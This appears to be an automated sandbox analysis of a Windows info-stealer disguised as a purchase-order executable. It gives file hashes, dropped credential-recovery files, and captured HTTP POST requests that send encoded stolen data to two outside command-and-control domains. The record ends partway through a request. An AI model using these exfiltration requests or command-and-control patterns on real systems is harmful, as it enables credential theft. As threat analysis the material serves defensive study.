SHA-512: CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious: false
Reputation: high, very likely benign file
Process: C:\Windows\SysWOW64\cmmon32.exe
File Type: JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category: dropped
Size (bytes): 83657
Entropy (8bit): 7.898144284385867
Encrypted: false
SSDEEP: 1536:CG5dxi4H6Ji4C92fQy4tmleny1AJYkD+EM7S/t+kZ+jCsM6tqQ8:/ftYCYfTwmlEJYT91kpX6A
MD5: B8F7447E7C46C85E512668F1E706AA10
SHA1: 8FBFEAF83150331DED8B76987DB1101988492A02
SHA-256: 0EC4EA12EE1EDB1D346E29348D668274BC4AC3A7A933FEA46344C228987109F1
SHA-512: B98745DC4AFD7FF38734A25ED0ED30FB1C786FAFCFA40868DB2FF7190BC3FF46E5602BA175CF49491D209CCEBAA9D110167287D307FD3AD52D400BF174705016
Malicious: false
Reputation: low
Process: C:\Windows\SysWOW64\cmmon32.exe
File Type: data
Category: dropped
Size (bytes): 38
Entropy (8bit): 2.7883088224543333
Encrypted: false
SSDEEP: 3:rFGQJhIl:RGQPY
MD5: 4AADF49FED30E4C9B3FE4A3DD6445EBE
SHA1: 1E332822167C6F351B99615EADA2C30A538FF037
SHA-256: 75034BEB7BDED9AEAB5748F4592B9E1419256CAEC474065D43E531EC5CC21C56
SHA-512: EB5B3908D5E7B43BA02165E092F05578F45F15A148B4C3769036AA542C23A0F7CD2BC2770CF4119A7E437DE3F681D9E398511F69F66824C516D9B451BB95F945
Malicious: false
Reputation: high, very likely benign file
                                    Preview:....C.h.r.o.m.e. .R.e.c.o.v.e.r.y.....
Process: C:\Windows\SysWOW64\cmmon32.exe
File Type: data
Category: dropped
Size (bytes): 40
Entropy (8bit): 2.8420918598895937
Encrypted: false
SSDEEP: 3:+slXllAGQJhIl:dlIGQPY
MD5: D63A82E5D81E02E399090AF26DB0B9CB
SHA1: 91D0014C8F54743BBA141FD60C9D963F869D76C9
SHA-256: EAECE2EBA6310253249603033C744DD5914089B0BB26BDE6685EC9813611BAAE
SHA-512: 38AFB05016D8F3C69D246321573997AAAC8A51C34E61749A02BF5E8B2B56B94D9544D65801511044E1495906A86DC2100F2E20FF4FCBED09E01904CC780FDBAD
Malicious: true
                                    Preview:....I.e.x.p.l.o.r. .R.e.c.o.v.e.r.y.....
Process: C:\Windows\SysWOW64\cmmon32.exe
File Type: data
Category: dropped
Size (bytes): 210
Entropy (8bit): 3.482329440248704
Encrypted: false
SSDEEP: 6:tGQPYlIaExGNlGcQga3Of9y96GO4yRl2rK9dEoY:MlIaExGNYvOI6x4+2rqY
MD5: F06976F974E77FCC372A01603909BA74
SHA1: 8810DEB0B9350EB4B9A4944FE488551275C2AEDA
SHA-256: D47B5E60BF213D7462CD33A88D49525F3386D773016DAE2AFADE8F4B5A330EFB
SHA-512: 742E06D22ACAA67705C3E31C32B3F2D086C509D1E5051EB431EF4D80BAF4F07742E415599EAE4E1200420F64F045D56A321A980F339B18052211AE44FD3437F2
Malicious: true
                                    Preview:...._._.V.a.u.l.t. .R.e.c.o.v.e.r.y.........N.a.m.e.:...M.i.c.r.o.s.o.f.t.A.c.c.o.u.n.t.:.t.a.r.g.e.t.=.S.S.O._.P.O.P._.D.e.v.i.c.e.....I.d.:...0.2.i.y.v.x.c.v.d.z.s.g.u.h.l.n.....A.u.t.:.......P.a.s.s.:.......
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.7372852843844555
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: PO#12108997.exe
File size: 655872
MD5: 5f6801fb007ede49a68943ef905b54c6
SHA1: a01e755201a0f7caec5b123db1d26776948d33c4
SHA256: ce5e4278243ecbcd11f46db7a76dc39f0ce091914bf298af73fb4e1e5391441b
SHA512: c6654f13807ce635733cb1c2395bcc82799fba03b92f679b926afd2547e5f7c06f3ee581e7116554c830593ea4a0d5606ae392d7fff155d9e2f07415106c37db
SSDEEP: 12288:XqIaPToULJVomEffELKPc9ok5l0ui0vOO6DKA7A8EZGFWA4n8WZkD+00akdfrYLm:i9Vo9OKPcyk55iYaD77hEZ4MnjkD+7aq
TLSH: 6BD4F17EE9E39F11C7282371D4D21E001735562AF2B3F3AF1B4A42E48A02BD79955B87
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@.}b..............0.................. ... ....@.. .......................`............@................................
Icon Hash: 00828e8e8686b000
Entrypoint: 0x4a198e
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x627DEF40 [Fri May 13 05:40:16 2022 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
(the remaining entrypoint bytes are zero padding, which disassembles as repeated "add byte ptr [eax], al")
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa1940 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa2000 | 0x38c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa4000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xa18f9 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x9f994 | 0x9fa00 | False | 0.869802882733 | data | 7.74619611944 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0xa2000 | 0x38c | 0x400 | False | 0.37109375 | data | 2.87055445871 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xa4000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country
RT_VERSION | 0xa2058 | 0x334 | data | |

DLL | Import
mscoree.dll | _CorExeMain

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright 2017
Assembly Version | 1.0.0.0
InternalName | ActivityCont.exe
FileVersion | 1.0.0.0
CompanyName |
LegalTrademarks |
Comments |
ProductName | ResetEvent
ProductVersion | 1.0.0.0
FileDescription | ResetEvent
OriginalFilename | ActivityCont.exe
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 14, 2022 11:55:46.587146044 CEST | 52581 | 53 | 192.168.2.3 | 8.8.8.8
May 14, 2022 11:55:46.636457920 CEST | 53 | 52581 | 8.8.8.8 | 192.168.2.3
May 14, 2022 11:56:05.055722952 CEST | 50152 | 53 | 192.168.2.3 | 8.8.8.8
May 14, 2022 11:56:05.079689980 CEST | 53 | 50152 | 8.8.8.8 | 192.168.2.3
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 14, 2022 11:55:46.587146044 CEST | 192.168.2.3 | 8.8.8.8 | 0x4b2d | Standard query (0) | www.tyz.world | A (IP address) | IN (0x0001)
May 14, 2022 11:56:05.055722952 CEST | 192.168.2.3 | 8.8.8.8 | 0x36b5 | Standard query (0) | www.madurababe.net | A (IP address) | IN (0x0001)

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 14, 2022 11:55:46.636457920 CEST | 8.8.8.8 | 192.168.2.3 | 0x4b2d | No error (0) | www.tyz.world | tyz.world | | CNAME (Canonical name) | IN (0x0001)
May 14, 2022 11:55:46.636457920 CEST | 8.8.8.8 | 192.168.2.3 | 0x4b2d | No error (0) | tyz.world | | 34.102.136.180 | A (IP address) | IN (0x0001)
May 14, 2022 11:56:05.079689980 CEST | 8.8.8.8 | 192.168.2.3 | 0x36b5 | No error (0) | www.madurababe.net | | 188.114.97.10 | A (IP address) | IN (0x0001)
May 14, 2022 11:56:05.079689980 CEST | 8.8.8.8 | 192.168.2.3 | 0x36b5 | No error (0) | www.madurababe.net | | 188.114.96.10 | A (IP address) | IN (0x0001)

• www.tyz.world
• www.madurababe.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49810 | 34.102.136.180 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
May 14, 2022 11:55:46.696173906 CEST | 10867 | OUT | GET /p12s/?q88dJ=WbLp3RdxCDJd&3f=8qmMWLN6/JQqhm+wveR6/OJHhm8N3VLr8xJt4w8M8t9FDLm1ANqb2O/T37+jkq0kwDJA HTTP/1.1
Host: www.tyz.world
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 14, 2022 11:55:46.808926105 CEST | 10868 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Sat, 14 May 2022 09:55:46 GMT
Content-Type: text/html
Content-Length: 291
ETag: "627e7264-123"
Via: 1.1 google
Connection: close
Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49811 | 34.102.136.180 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
May 14, 2022 11:55:48.880199909 CEST | 10869 | OUT | POST /p12s/ HTTP/1.1
Host: www.tyz.world
Connection: close
Content-Length: 408
Cache-Control: no-cache
Origin: http://www.tyz.world
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.tyz.world/p12s/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
                                    Data Ascii: 3f=0Iq2IvxcyZ8kjnO8uZ4N~6wgmksX(GSsqUIqkjAVw41EF4iFAPz22a6dnbfQ46Q47hExYjTh8G4Te4yvtS1N8Vol5oXdVn9UqdSV6H3ICwSOg4cshILFSGKpHRzWllcAfdbHtKu0c1AlYDfTm3FG09JNuH60fXgQF18CbPe1lvw7FImOM47B4gCH6eMVgtx_EOBiVRXKdgf0l37S6BTp922_hdoxNmCUNCv807MMGWDQMTHutfwubZVcKCdHrGRFPQsgqsxSFCJLcIeA16(eGH7UnWyKh8l_9UVDsM7rNR83rBWFoFuVrRqy3hE6xRhnLl(i2j27UfMuDQq8bUGBBmw_a3GSVAGQVAWndrt7wz7NI_BbiYka~eGHWksZz58qUQzSWvtGueYsJjND5A).
May 14, 2022 11:55:48.993570089 CEST | 11023 | IN | HTTP/1.1 405 Not Allowed
Server: openresty
Date: Sat, 14 May 2022 09:55:48 GMT
Content-Type: text/html
Content-Length: 154
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_CZSy2LJoIDizRMKEnV+GvgxGcf91vjvF3b9piDC3xboCYxr5eBm+yI3Ho5/bWevm+hsCTi0lgKoiAWFoTINoQA
Via: 1.1 google
Connection: close
Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49812 | 34.102.136.180 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
May 14, 2022 11:55:48.901112080 CEST | 10883 | OUT | POST /p12s/ HTTP/1.1
Host: www.tyz.world
Connection: close
Content-Length: 148780
Cache-Control: no-cache
Origin: http://www.tyz.world
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.tyz.world/p12s/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
                                    Data Ascii: 3f=0Iq2IrFI0po5xB~_pZoFvLB9kXYf4VvVnkk6kmJS9cxJToSFQ9bxw66elbfRprtN7yU5Yh(f8GwMQfCmti0N81tQ(p2PVh08q7LK9HLIIk~QlZs325HwMmmgFRbTl1x5e_nhqLy2Wjo-UgH3sEUXxs5KrFHqb0UcG09iYN20o_o5AL~wIMr06weT6Yoj4v1qOpBQSkvgWxr2gEiX~DL-yWGQ~psQK1WdOEq7qugBED7cUzWXgvE2S4lzNF5U5XxdOV1Bysw-HCJfXbGoxdvRUz(6tFDN2d576SdLvsPqKhANjQnys2CS8C3HzhEnsiJsLl(f2mDUXLMuMhKvXXuNQWwYdjaUcTSAVAundadRwDDNEMpYi8wawOGHDUsLzZRIRH77b8Zgm-k7cxI7i8ZHe6Ihl5xVxihSn_mjxu(ZYKR6LopJg07YBQJJQv9YqI65gxNXl0tz2uMKb3U3pqY5tmFom6R8TA78oGwJVOeftAnydKR9VGr1NfvBARVmEuETRH5Ao03NS6ZF0MmRGrUeZcxvUcIfqLDwvDYxhH5pZltu(LE6NRGcr2gelfDEEFiQ1HjWeimjVRtuY-3X8CRC8LKxmKYHrvzx(x~9d_qpPe0P3nEmPtNiF4w-CVF-hteZio81yf9iGKAWAy3PA04Tu1(K0XCixqIogOOVRWEZWBRLyAYi98T0c7sTASkJ0eepCVzCpsyz(ovgVBVHxIBeY6piZZqHEEw3s7xOSzT_4pBhtW77k8MtobB5(DqGoM6z9VTw8TtZNBgKxtGiDxmJbH7XvTqdBZBPZHXvgR9q9d7OVslD5MMTWfGN7fPuVRitv2X_vKJIHiEDJIwZVpxH0Xn1YT2NqdSfkANDLkOofM(XIFqLPGyh1mfRp1kmdCiUOKg56s6T6WfukL0xhl0st-nHT6B7PFk8iT1t1ucurK0ozT4oPy4DvJuVwjSgxIvvBXb2BGlQz7YqV5oe5H~V1gO6Purp8YSr24~_tPTWhGDmYYEtxNPJ3ZlgqxuHUNF1fUwCXHvJAHumYqUOG0rN0-nD2PfOaKGHvxCC7iExeY4P5n4I5tZPGr6Eqe3u16tm39E5uzMwpoe1IcrFeIiXFj0Adrszb6oSzWvy8pkd7tp1WU9q3zCnYW15a-JQot~NTNOTKlGrTTcZzDV3FwpTVSnBpqCoc-aEqz485IlS33AX8aqWM9lCzYSqFHfrHPAGmagEcApSo1j_fje4M_F4ZReX0z~5fx9AiP8byl(TvuyOnZ3SDyt91HgFUyZjgRu8iXn9gYhodx(Jhaonzp5810XQRVnytguH6T2EB3YmLExHtVEJMxH4ZYL_eUJM92bCUIIYws7nUIytMZQpgO1x9VSrhr(MHmiWbHEMG6LsCUHksfpSmVqIliu72Kkb3glMTyYf4P(ogoicN6tjEbEqv845omXU5EU_SQsAUWGfxs0SG_pXgcfN710Uhh4O4dJNYokow6hlZy2a8YCsUsOFRpPLMw8OFVONvv(4rSGcweis(L5h5cO-25wckAEDKl83b4pRevRps1cXULW7zkv5o-h7GRZHvt(-Fb(kPxdkq1XuLTM2ZWyXuR5AlucAIqZLLsQrfsBPcvvQdaX-X4ilY4InDUt4KV(y~SM94MQXm9GG~XobZihQXnnJ3d6lna5eewMyACfpfNpSe5s-wHi1lVSu9HED1rEoD0zkbetPIO3zKRLgn8ceNKIooSr91DQNf_CZjg7FGz6ACrihkv6iJ6G84Q3QUQBGsaGeJq9navOEYyJGXQpYUP0w4UZ_JWyXMbXHC1zo5gTGRBAUplQWQg7S00ZSN579CFH8xz8rXwxc(ICu(6KaLcbAwHPY3okDhJQCjtLM0wj4jWg2lKrTFrBVRibBTQ4ngk5q5RenITU7JPmYzYj5d_oRASUYu3MGd-P4YOupTey3uzYe0_VvrdYweMA2P
VsPxKX-7ZhlqfKoJnECG-MTcej09J(Wddf21ShkPKjOaN8KikN4z8Ts5potVQMuY93Rfhr0ga2aV0VFSxsrYD2rIjjdYxVHuc~M11pwydEVHE3Z3wmCIEFnSKQcsthooQWJCiKYv-O26nQ5B94lccsvw-IkVRQRhn9oa5t-Z4yu(H3aKFZ0~lmm(Wor07SHVp(Zk5z_gjfzgc76dkCS9scrQy8VAK5jkcZPMX3f8pSZju22Co~56bRV1DMNAzBXHIFWG8qrmtPOfgWaENzmGEf9MTwFc74Y0jcG2wuTUw1CM41lS0IF2Of_poc66UJaud79U9zUwrVPoYrJ2ioDpq(OY5yBKgH8KetFLJC_yjh4VVFlesep3wLkqT4cmYNLU21PGVWwX0oDsU~RyfQU6RTC6Qh0a-g3xMmkkzyfk65XurandQdbM1J5c6lkZumrYbNPlJlXdvCb9fCJ730WMSzqIp~08s(F12xoGClE(694U03oRi08FuX7hi4V70w4VKUxnLLMo1ZTqwkkDPq7lsNzORoc4NN9LAVBVIPxGFn4(mbT0HJbC03ZTL(YFkXtcps9Ua0EtATrNnUKyZFUqkB-yuSJJ1u6XZUOEz2pr_5lMGTUMa3pzBzMAGKO(qfyj8yLUN1OEb5k~LvUyew5Nf9d0daBAbJmTKmkuxPCfXx6rIN4UTpAwDjQnV2TgRORHQrR1BJiK2Hu(GhmuBhilviDTTNZTW3Vu4MO9kPow4JTqSOP25q4TjBar88M(6yWJIPr(yEtyR8wTN27OZE9kaPz85sFmPnu6rqLx3w5BOwdAEamTCDYl3BrmZl92ZyoMAeiwW(06nsvzJneSvVRVeoIILic2jo8zTrjyg1ULRywE0hCGU2-8bFIufS-3i2GSA6YGQjsFeDQvOZg9RKrV82ticiZE9fNTyZPTJb55iXAsMpt8qWVMNslQZPndyIF8VK3IcPMJ2Dosrcv6C3u~S(dxpll6tgKMcq3RbHZhS8n1Cz5EZdEKKxSfh2LMGs2GCGQOYIzoKFDd0FvGO9l5uNktpz9SMssBeZfGuHIapPQjQ6ysXR36U~8upTgg6LuAviyOGAicSxPEdfdhxEjkAxI0hIH9umONQZogYDnV_kZQnecP4noeOKw5XX88AXTimuQHOSYC8bvSmowDtHB~qZXu-TbOjABjGozlbM_uCPr1vVtr8L96nthnq4XnDu1Mfop2krlKfI0IOr_GoXvKjKYcm1Ik2TCIVcq8IGaUFeuSYufWT5d4sX_brAmPWxSa1AhwuDWFlVV9ecUKmaOJqFD4Z6nsr6fMhvPQKHERU5BlioAguiHMlWtWunZPnKGYTYkAYfq9vAA1uV_cYbqWE1iNA(YDVnq9kNODUwyXKYGeOBXIcO6iMfMxWKweLSiR4ZSsNOkJ1ptuMOdk5H0FY426WEyLAHqis63Kg6OtkVw8wIZc4sIc1J70vknPTJVUqIs~KAQCCiUd8evgiB264baUk2Eupn3y-QIblsfsYTOywOX96wT(glPOqp9dNVndsyIi47MNNhtEirKNDMGgfV4LfTy1UJokiiH~cK4okfzUiFtFPmmKdi6eel5undPvELFT99OrQQfdVtPdxys9u4AFptKPujCda46zM3dL-72MdJacO7S8tuGF4n7DqrfPEbm2Z8Ti4NkDwyjIBdZ~ap8jza0ThY0Fgcsv3dTRYG5a8PH3opwwaW4i9hR~NpYf9~PBp7LWJzwOrk8TpGCUygExlv5T-R4n390fqPcHeLswZZvc0Kh(XyxrBwBQdDsnb(IJ_QpkE77lH28yyqsFVsypg9gN6xyCrqMvOI1HftD8YDtkLjs20Jgx6o8DZB2WdCI~I30jKNOBiNKZSr4IqcRlTk1cjT3gndf4G(vm4b1ZTNWOMtIx2NeOO6-6-hunukaD3eKBrV9V85btb3pSsBSsqZCIOiAS-e1AIUnlV~-ycSd8YXK2pJ_KOiRk3(R8E1NNbhN7NZvmdazx
HjCaHMQCEkw6BGbhXB-yC6Y1qcwQBotok~Krf5KrXftWxEqajoa2IVyy56RYW44p6F1ynoXg4~qusmv~XdIf76VIBVPhKKCm1vOs1Y45GIX48jJ~9xtHOdDPZb9ML8vz9~tKAp
                                    May 14, 2022 11:55:49.015769005 CEST | 11024 | IN | HTTP/1.1 405 Not Allowed
                                    Server: openresty
                                    Date: Sat, 14 May 2022 09:55:48 GMT
                                    Content-Type: text/html
                                    Content-Length: 154
                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_CZSy2LJoIDizRMKEnV+GvgxGcf91vjvF3b9piDC3xboCYxr5eBm+yI3Ho5/bWevm+hsCTi0lgKoiAWFoTINoQA
                                    Via: 1.1 google
                                    Connection: close
                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    3 | 192.168.2.3 | 49839 | 188.114.97.10 | 80 | C:\Windows\explorer.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    May 14, 2022 11:56:05.097192049 CEST | 11089 | OUT | GET /p12s/?3f=r50L8sv8FZiHucxi8RnCmWG3E/gD+O9hwT0hmGjF5KhMWddC+dQqagaFzg96cYhfQjEI&q88dJ=WbLp3RdxCDJd HTTP/1.1
                                    Host: www.madurababe.net
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    May 14, 2022 11:56:05.127767086 CEST | 11089 | IN | HTTP/1.1 301 Moved Permanently
                                    Date: Sat, 14 May 2022 09:56:05 GMT
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Cache-Control: max-age=3600
                                    Expires: Sat, 14 May 2022 10:56:05 GMT
                                    Location: https://www.madurababe.net/p12s/?3f=r50L8sv8FZiHucxi8RnCmWG3E/gD+O9hwT0hmGjF5KhMWddC+dQqagaFzg96cYhfQjEI&q88dJ=WbLp3RdxCDJd
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bSMAVbyB%2FDhTtSqJ0%2BXRULTS9tdHFfG4hOzsi1PPheIwfR8%2B82SzXLEVuFCSbdiyFgb1jkypFeKeGdo8WTDEVYaHDrU%2BwEc8wNlcXGqhuZGxKWI%2BbLOBz%2BTKWXWMW1B3J0GzDyc%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 70b2c30be83f9945-FRA
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    4 | 192.168.2.3 | 49840 | 188.114.97.10 | 80 | C:\Windows\explorer.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    May 14, 2022 11:56:07.157748938 CEST | 11091 | OUT | POST /p12s/ HTTP/1.1
                                    Host: www.madurababe.net
                                    Connection: close
                                    Content-Length: 408
                                    Cache-Control: no-cache
                                    Origin: http://www.madurababe.net
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://www.madurababe.net/p12s/
                                    Accept-Language: en-US
                                    Accept-Encoding: gzip, deflate
                                    Data Raw: 33 66 3d 6a 62 34 78 69 4d 54 78 62 34 71 31 36 62 38 45 67 6b 6d 64 38 44 4b 76 45 76 51 54 31 4b 70 54 6b 45 38 35 33 33 72 62 79 66 78 53 64 70 56 34 37 64 5a 79 50 30 58 33 67 52 77 45 56 4d 42 49 51 54 70 43 6d 33 5a 39 65 2d 39 39 61 4d 7a 34 51 6b 4b 33 68 31 6a 76 53 57 30 71 6f 77 54 66 47 70 7a 35 7e 6f 43 72 64 4d 63 34 74 63 36 41 67 6b 6d 37 6c 4c 45 59 49 6c 72 4b 72 43 38 7a 78 62 63 69 35 31 30 43 59 4b 41 36 38 55 77 36 50 62 28 72 6f 6b 76 48 6a 61 4c 65 66 6a 33 30 77 68 58 78 57 7a 73 57 6e 61 79 59 4d 6e 31 58 6d 58 6a 44 4f 59 64 76 4f 4c 6b 4d 56 56 4b 4b 4d 33 58 6f 34 77 6a 5f 41 78 52 4b 32 62 31 36 63 73 6a 62 43 4c 6e 69 61 4b 71 70 48 77 51 39 30 4b 6e 47 58 6b 41 33 47 30 70 68 61 79 4f 57 71 43 6a 69 64 42 61 76 73 4b 75 4b 38 36 33 54 41 42 72 6b 31 59 6b 78 5a 6f 75 37 64 77 31 42 34 6f 41 78 76 65 71 39 64 61 6c 44 43 48 6c 76 39 57 30 6b 59 46 54 41 75 6e 79 5a 66 44 6d 4b 49 44 45 32 4a 32 72 66 68 35 70 68 47 52 54 6c 68 42 39 6f 28 51 4b 37 33 31 42 43 63 45 42 37 61 61 76 45 39 39 73 4d 28 30 59 64 31 65 48 50 72 7a 43 77 28 6a 35 4b 38 42 62 43 75 75 78 34 78 68 34 49 7a 64 66 68 4a 6d 6f 66 4e 70 57 65 68 47 4b 48 54 45 73 4c 4a 31 69 75 68 4f 51 75 65 77 29 2e 00 00 00 00 00 00 00 00
                                    Data Ascii: 3f=jb4xiMTxb4q16b8Egkmd8DKvEvQT1KpTkE8533rbyfxSdpV47dZyP0X3gRwEVMBIQTpCm3Z9e-99aMz4QkK3h1jvSW0qowTfGpz5~oCrdMc4tc6Agkm7lLEYIlrKrC8zxbci510CYKA68Uw6Pb(rokvHjaLefj30whXxWzsWnayYMn1XmXjDOYdvOLkMVVKKM3Xo4wj_AxRK2b16csjbCLniaKqpHwQ90KnGXkA3G0phayOWqCjidBavsKuK863TABrk1YkxZou7dw1B4oAxveq9dalDCHlv9W0kYFTAunyZfDmKIDE2J2rfh5phGRTlhB9o(QK731BCcEB7aavE99sM(0Yd1eHPrzCw(j5K8BbCuux4xh4IzdfhJmofNpWehGKHTEsLJ1iuhOQuew).


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    5 | 192.168.2.3 | 49841 | 188.114.97.10 | 80 | C:\Windows\explorer.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    May 14, 2022 11:56:07.177649021 CEST | 11104 | OUT | POST /p12s/ HTTP/1.1
                                    Host: www.madurababe.net
                                    Connection: close
                                    Content-Length: 148780
                                    Cache-Control: no-cache
                                    Origin: http://www.madurababe.net
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://www.madurababe.net/p12s/
                                    Accept-Language: en-US
                                    Accept-Encoding: gzip, deflate
